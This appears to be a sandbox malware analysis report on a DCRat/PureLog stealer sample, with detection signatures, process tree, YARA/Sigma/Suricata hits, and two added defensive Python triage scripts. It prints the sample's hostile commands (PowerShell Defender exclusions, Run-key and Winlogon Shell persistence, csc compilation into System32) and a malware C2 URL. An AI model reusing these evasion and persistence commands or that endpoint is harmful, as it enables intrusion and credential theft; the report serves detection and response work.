

Windows Analysis Report
VQdUvAQ4xO.exe

Overview

General Information

Sample name: VQdUvAQ4xO.exe (renamed because the original name is a hash value)
Original sample name: c8ce6fc2028745f5eaf01a412d06acaa.exe
Analysis ID: 1596749
MD5: c8ce6fc2028745f5eaf01a412d06acaa
SHA1: 4be17e69614ea35c4cd9939f84034e0e1e43a9a0
SHA256: bd068366ec33c420f480a1085cf661ae74ab13ac83bda6ccc9997d5495bed125
Tags: DCRat, exe, user-abuse_ch

Detection

DCRat, PureLog Stealer, ReverseShell, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected ReverseShell
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Creates an autostart registry key pointing to binary in C:\Windows
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Drops executables to the windows directory (C:\Windows) and starts them
Infects executable files (exe, dll, sys, html)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Powershell Defender Exclusion
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • VQdUvAQ4xO.exe (PID: 1216 cmdline: "C:\Users\user\Desktop\VQdUvAQ4xO.exe" MD5: C8CE6FC2028745F5EAF01A412D06ACAA)
    • csc.exe (PID: 1720 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dj5thqfb\dj5thqfb.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
      • conhost.exe (PID: 3524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cvtres.exe (PID: 1136 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6A2D.tmp" "c:\Windows\System32\CSCA8FE6D7D9B7A4B07A0A2A3B7931FCBDF.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • powershell.exe (PID: 2488 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4940 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\System32\r6Lr6XbTWt.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7184 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\0eDO5Zbs.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7224 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\mENvqiIeFx.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 8168 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 7296 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Sidebar\JOajDppbSkfqSPK1G9zAbH.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7332 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VQdUvAQ4xO.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7596 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\cJIROItyvb.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 7832 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • PING.EXE (PID: 7916 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
      • r6Lr6XbTWt.exe (PID: 7548 cmdline: "C:\Windows\System32\r6Lr6XbTWt.exe" MD5: C8CE6FC2028745F5EAF01A412D06ACAA)
  • tNOtXAG6xwxcUNu9tjBa.exe (PID: 8012 cmdline: "C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe" MD5: C8CE6FC2028745F5EAF01A412D06ACAA)
    • cmd.exe (PID: 2648 cmdline: "C:\Windows\System32\cmd.exe" /c "C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tNOtXAG6xwxcUNu9tjBa.exe (PID: 8084 cmdline: "C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe" MD5: C8CE6FC2028745F5EAF01A412D06ACAA)
  • svchost.exe (PID: 1804 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • r6Lr6XbTWt.exe (PID: 6372 cmdline: "C:\Windows\System32\r6Lr6XbTWt.exe" MD5: C8CE6FC2028745F5EAF01A412D06ACAA)
  • 0eDO5Zbs.exe (PID: 5728 cmdline: "C:\Recovery\0eDO5Zbs.exe" MD5: C8CE6FC2028745F5EAF01A412D06ACAA)
  • mENvqiIeFx.exe (PID: 3520 cmdline: "C:\Program Files\Windows Portable Devices\mENvqiIeFx.exe" MD5: C8CE6FC2028745F5EAF01A412D06ACAA)
  • JOajDppbSkfqSPK1G9zAbH.exe (PID: 1184 cmdline: "C:\Program Files\Windows Sidebar\JOajDppbSkfqSPK1G9zAbH.exe" MD5: C8CE6FC2028745F5EAF01A412D06ACAA)
  • VQdUvAQ4xO.exe (PID: 6708 cmdline: "C:\Users\user\Desktop\VQdUvAQ4xO.exe" MD5: C8CE6FC2028745F5EAF01A412D06ACAA)
  • tNOtXAG6xwxcUNu9tjBa.exe (PID: 7732 cmdline: "C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe" MD5: C8CE6FC2028745F5EAF01A412D06ACAA)
  • r6Lr6XbTWt.exe (PID: 5212 cmdline: "C:\Windows\System32\r6Lr6XbTWt.exe" MD5: C8CE6FC2028745F5EAF01A412D06ACAA)
  • 0eDO5Zbs.exe (PID: 5468 cmdline: "C:\Recovery\0eDO5Zbs.exe" MD5: C8CE6FC2028745F5EAF01A412D06ACAA)
  • mENvqiIeFx.exe (PID: 736 cmdline: "C:\Program Files\Windows Portable Devices\mENvqiIeFx.exe" MD5: C8CE6FC2028745F5EAF01A412D06ACAA)
  • JOajDppbSkfqSPK1G9zAbH.exe (PID: 4320 cmdline: "C:\Program Files\Windows Sidebar\JOajDppbSkfqSPK1G9zAbH.exe" MD5: C8CE6FC2028745F5EAF01A412D06ACAA)
  • VQdUvAQ4xO.exe (PID: 8044 cmdline: "C:\Users\user\Desktop\VQdUvAQ4xO.exe" MD5: C8CE6FC2028745F5EAF01A412D06ACAA)
  • tNOtXAG6xwxcUNu9tjBa.exe (PID: 7936 cmdline: "C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe" MD5: C8CE6FC2028745F5EAF01A412D06ACAA)
  • r6Lr6XbTWt.exe (PID: 3864 cmdline: "C:\Windows\System32\r6Lr6XbTWt.exe" MD5: C8CE6FC2028745F5EAF01A412D06ACAA)
  • cleanup
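Reading the tree above by hand is how this report is meant to be used; a triage script should do the same mechanically. The Python below is an added example (not code from Joe Sandbox or from the sample) that parses an excerpt of this tree, copied verbatim from the report, into parent/child relationships and then pulls out four things a responder wants from it: the paths excluded from Defender via Add-MpPreference, csc.exe compiling a .cmdline response file out of a Temp directory, ping -n N localhost used as a sleep, and copies of the sample (same MD5) that start with no parent in the tree, which is what a persisted copy launched by the OS looks like. The regexes, rule names and the Proc record are the example's own.

```python
import re
from collections import namedtuple

# Constructed excerpt of the Joe Sandbox process tree for this sample: the lines
# are copied from the report, branches not needed by the checks below are omitted.
PROCESS_TREE = r"""
  • VQdUvAQ4xO.exe (PID: 1216 cmdline: "C:\Users\user\Desktop\VQdUvAQ4xO.exe" MD5: C8CE6FC2028745F5EAF01A412D06ACAA)
    • csc.exe (PID: 1720 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dj5thqfb\dj5thqfb.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
      • conhost.exe (PID: 3524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 2488 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 4940 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\System32\r6Lr6XbTWt.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 7596 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\cJIROItyvb.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • PING.EXE (PID: 7916 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
      • r6Lr6XbTWt.exe (PID: 7548 cmdline: "C:\Windows\System32\r6Lr6XbTWt.exe" MD5: C8CE6FC2028745F5EAF01A412D06ACAA)
  • tNOtXAG6xwxcUNu9tjBa.exe (PID: 8012 cmdline: "C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe" MD5: C8CE6FC2028745F5EAF01A412D06ACAA)
  • 0eDO5Zbs.exe (PID: 5728 cmdline: "C:\Recovery\0eDO5Zbs.exe" MD5: C8CE6FC2028745F5EAF01A412D06ACAA)
"""

Proc = namedtuple("Proc", "pid image cmdline md5 parent")

# One tree line: indentation, bullet, image name, PID, command line, MD5 of the image.
LINE_RE = re.compile(
    r"^(?P<indent> *)• (?P<image>\S+) \(PID: (?P<pid>\d+) cmdline: (?P<cmd>.*) MD5: (?P<md5>[0-9A-Fa-f]{32})\)$"
)
EXCLUSION_RE = re.compile(r"Add-MpPreference\s+-ExclusionPath\s+'([^']+)'", re.I)
PING_SLEEP_RE = re.compile(r"\bping(?:\.exe)?\s+-n\s+(\d+)\s+(?:localhost|127\.0\.0\.1)\b", re.I)
CSC_RE = re.compile(r'csc\.exe.*@"([^"]+\.cmdline)"', re.I)
QUOTED_PATH_RE = re.compile(r'^"([^"]+)"')


def parse_tree(text):
    """Turn the indented bullet list into {pid: Proc}; parents follow from indentation depth."""
    procs, stack = {}, []  # stack holds (depth, pid) of the currently open ancestors
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        depth = len(m["indent"]) // 2
        while stack and stack[-1][0] >= depth:
            stack.pop()
        parent = stack[-1][1] if stack else None
        proc = Proc(int(m["pid"]), m["image"], m["cmd"], m["md5"].upper(), parent)
        procs[proc.pid] = proc
        stack.append((depth, proc.pid))
    return procs


def image_path(proc):
    m = QUOTED_PATH_RE.match(proc.cmdline)
    return m.group(1) if m else proc.cmdline.split(" ")[0]


def triage(procs, sample_md5):
    """Apply the four checks and return the evidence for each as plain lists."""
    sample_md5 = sample_md5.upper()
    original = next(p for p in procs.values() if p.md5 == sample_md5)
    findings = {"defender_exclusions": [], "ping_sleeps": [], "dynamic_compiles": [], "relaunched_copies": []}
    for p in procs.values():
        parent = procs.get(p.parent)
        if m := EXCLUSION_RE.search(p.cmdline):
            findings["defender_exclusions"].append(m.group(1))
        if m := PING_SLEEP_RE.search(p.cmdline):
            # N echo requests with a one-second gap between them: roughly N-1 seconds of delay
            findings["ping_sleeps"].append((p.pid, int(m.group(1)) - 1, parent.image if parent else None))
        if (m := CSC_RE.search(p.cmdline)) and parent and "\\AppData\\Local\\Temp\\" in m.group(1):
            findings["dynamic_compiles"].append((parent.image, m.group(1)))
        if p.md5 == sample_md5 and p.parent is None and p.pid != original.pid:
            # same binary, started with no parent in the tree: a persisted copy launched by the OS
            findings["relaunched_copies"].append(image_path(p))
    return findings


if __name__ == "__main__":
    for kind, items in triage(parse_tree(PROCESS_TREE), "c8ce6fc2028745f5eaf01a412d06acaa").items():
        print(kind, items)
```

The excluded paths are also the drop locations, so the exclusion list doubles as the list of files to collect; the relaunched copies tell you which of those locations were actually wired into persistence.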
No configs have been found
Yara matches, initial sample:
Source | Rule | Description | Author
VQdUvAQ4xO.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
VQdUvAQ4xO.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security

Yara matches, dropped files:
Source | Rule | Description | Author
C:\Windows\System32\r6Lr6XbTWt.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
C:\Windows\System32\r6Lr6XbTWt.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
C:\Program Files\Windows Portable Devices\mENvqiIeFx.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
C:\Program Files\Windows Portable Devices\mENvqiIeFx.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
(5 further dropped-file entries not shown)

Yara matches, memory dumps:
Source | Rule | Description | Author
00000000.00000000.1772742377.00000000005D2000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
00000000.00000002.1891369634.0000000012C1F000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security
Process Memory Space: VQdUvAQ4xO.exe PID: 1216 | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security
Process Memory Space: csc.exe PID: 1720 | JoeSecurity_ReverseShell | Yara detected ReverseShell | Joe Security
Process Memory Space: r6Lr6XbTWt.exe PID: 7548 | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security

Yara matches, unpacked PEs:
Source | Rule | Description | Author
0.0.VQdUvAQ4xO.exe.5d0000.0.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
0.0.VQdUvAQ4xO.exe.5d0000.0.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security

                              System Summary

Source: File created | Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ProcessId: 1720, TargetFilename: c:\Windows\System32\SecurityHealthSystray.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\VQdUvAQ4xO.exe", ParentImage: C:\Users\user\Desktop\VQdUvAQ4xO.exe, ParentProcessId: 1216, ParentProcessName: VQdUvAQ4xO.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe', ProcessId: 2488, ProcessName: powershell.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: "C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\VQdUvAQ4xO.exe, ProcessId: 1216, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\tNOtXAG6xwxcUNu9tjBa
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: explorer.exe, "C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\VQdUvAQ4xO.exe, ProcessId: 1216, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
Source: Process started | Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems) | Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dj5thqfb\dj5thqfb.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dj5thqfb\dj5thqfb.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\VQdUvAQ4xO.exe", ParentImage: C:\Users\user\Desktop\VQdUvAQ4xO.exe, ParentProcessId: 1216, ParentProcessName: VQdUvAQ4xO.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dj5thqfb\dj5thqfb.cmdline", ProcessId: 1720, ProcessName: csc.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\VQdUvAQ4xO.exe", ParentImage: C:\Users\user\Desktop\VQdUvAQ4xO.exe, ParentProcessId: 1216, ParentProcessName: VQdUvAQ4xO.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe', ProcessId: 2488, ProcessName: powershell.exe
Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\Users\user\Desktop\VQdUvAQ4xO.exe, ProcessId: 1216, TargetFilename: C:\Users\user\AppData\Local\Temp\dj5thqfb\dj5thqfb.cmdline
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\VQdUvAQ4xO.exe", ParentImage: C:\Users\user\Desktop\VQdUvAQ4xO.exe, ParentProcessId: 1216, ParentProcessName: VQdUvAQ4xO.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe', ProcessId: 2488, ProcessName: powershell.exe
Source: Process started | Author: vburov | Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 1804, ProcessName: svchost.exe
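The Sigma hits above are Sysmon-style events flattened into "Key: value" text. As an added example (not from the report, the rule authors, or the sample), the Python below parses that text and applies the three checks behind these hits: a Winlogon\Shell value that is anything other than explorer.exe, a new CurrentVersion\Run (or RunOnce) entry, and a compiler (csc.exe or vbc.exe) writing a file into C:\Windows. The event strings are constructed from the Data fields printed above; the field splitter, key lists and finding names are assumptions of the example.

```python
import re

# Constructed sample: the "Data" portion of the Sigma hits printed in this report
# (Sysmon-style events: EventID 13 = registry value set, EventID 11 = file created).
SIGMA_EVENTS = [
    r'Details: "C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\VQdUvAQ4xO.exe, ProcessId: 1216, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\tNOtXAG6xwxcUNu9tjBa',
    r'Details: explorer.exe, "C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\VQdUvAQ4xO.exe, ProcessId: 1216, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell',
    r'EventID: 11, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ProcessId: 1720, TargetFilename: c:\Windows\System32\SecurityHealthSystray.exe',
    r'EventID: 11, Image: C:\Users\user\Desktop\VQdUvAQ4xO.exe, ProcessId: 1216, TargetFilename: C:\Users\user\AppData\Local\Temp\dj5thqfb\dj5thqfb.cmdline',
]

# Split only at ", Key: " boundaries so that values which themselves contain ", "
# (the Winlogon Shell value above) survive intact.
FIELD_SPLIT = re.compile(r", (?=[A-Za-z|]+: )")
AUTORUN_KEYS = ("\\currentversion\\run\\", "\\currentversion\\runonce\\")
COMPILERS = ("csc.exe", "vbc.exe")


def parse_fields(data):
    fields = {}
    for part in FIELD_SPLIT.split(data):
        key, _, value = part.partition(": ")
        fields[key] = value.strip()
    return fields


def check_autoruns(events):
    """Return (finding, value, writing image) triples for the persistence patterns."""
    findings = []
    for ev in map(parse_fields, events):
        eid, image = ev.get("EventID"), ev.get("Image", "")
        target = ev.get("TargetObject", "").lower()
        if eid == "13" and target.endswith("\\winlogon\\shell"):
            # Winlogon\Shell is exactly "explorer.exe" on a clean host; anything
            # appended after a comma is started alongside the desktop at every logon.
            if ev["Details"].strip().lower() != "explorer.exe":
                findings.append(("winlogon_shell_modified", ev["Details"], image))
        elif eid == "13" and any(k in target for k in AUTORUN_KEYS):
            findings.append(("run_key_added", ev["Details"].strip('"'), image))
        elif eid == "11":
            written = ev.get("TargetFilename", "")
            if written.lower().startswith("c:\\windows\\") and image.lower().endswith(COMPILERS):
                # A compiler emitting output straight into the Windows directory is the
                # dynamic-compilation-to-system-path pattern the Sigma hits describe.
                findings.append(("compiler_wrote_system_dir", written, image))
    return findings


if __name__ == "__main__":
    for finding in check_autoruns(SIGMA_EVENTS):
        print(*finding, sep=" | ")
```

The fourth event (the .cmdline response file written to Temp by the sample itself) produces no finding on its own; it is the csc.exe write into System32 that follows it which matters.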

                              Data Obfuscation

Source: Process started | Author: Joe Security | Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dj5thqfb\dj5thqfb.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dj5thqfb\dj5thqfb.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\VQdUvAQ4xO.exe", ParentImage: C:\Users\user\Desktop\VQdUvAQ4xO.exe, ParentProcessId: 1216, ParentProcessName: VQdUvAQ4xO.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dj5thqfb\dj5thqfb.cmdline", ProcessId: 1720, ProcessName: csc.exe

Suricata IDS alerts:
Timestamp | SID | Severity | Classtype | Source | Destination | Protocol
2025-01-22T13:22:29.114449+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4:49739 | 104.21.95.93:80 | TCP
2025-01-22T13:22:13.998572+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4:49732 | 34.117.59.81:443 | TCP
2025-01-22T13:22:34.389157+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4:49749 | 34.117.59.81:443 | TCP
2025-01-22T13:22:15.218847+0100 | 1810009 | 1 | Potentially Bad Traffic | 192.168.2.4:49733 | 149.154.167.220:443 | TCP
2025-01-22T13:22:35.477191+0100 | 1810009 | 1 | Potentially Bad Traffic | 192.168.2.4:49751 | 149.154.167.220:443 | TCP


                              AV Detection

Source: VQdUvAQ4xO.exe | Avira: detected
Source: http://525833cm.nyashnyash.ru/providerServerprotectTrafficDlePublic.php | Avira URL Cloud: Label: malware
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files\Windows Sidebar\JOajDppbSkfqSPK1G9zAbH.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
